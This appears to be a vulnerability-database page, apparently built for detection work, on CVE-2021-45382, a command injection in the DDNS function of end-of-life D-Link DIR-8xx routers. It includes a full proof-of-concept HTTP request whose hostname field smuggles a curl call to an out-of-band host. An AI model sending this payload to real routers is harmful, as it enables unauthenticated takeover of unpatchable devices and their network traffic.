🔙 목록으로 돌아가기

CVE-2021-45382: D-Link - Remote Command Execution

TitleD-Link - Remote Command Execution
Authorking-alexander
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary system commands via command injection in the DDNS function, leading to complete router compromise and control over network traffic.
RemediationDIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
CVSS Score9.8
EPSS Score0.9423
CVE IDCVE-2021-45382
CWE IDCWE-78
Tags cve2021 cve dlink kev rce vkev vuln

🔍 Vulnerability Description

A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file

🌐 HTTP Request

POST /ddns_check.ccp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Content-Length: 126
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

ccp_act=doCheck&ddnsHostName=;curl https://d5job4hle0o2d91d93s0mag5876yibeo3.oast.site;&ddnsUsername=oahe2&ddnsPassword=ssrrap

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45382.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-45382.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A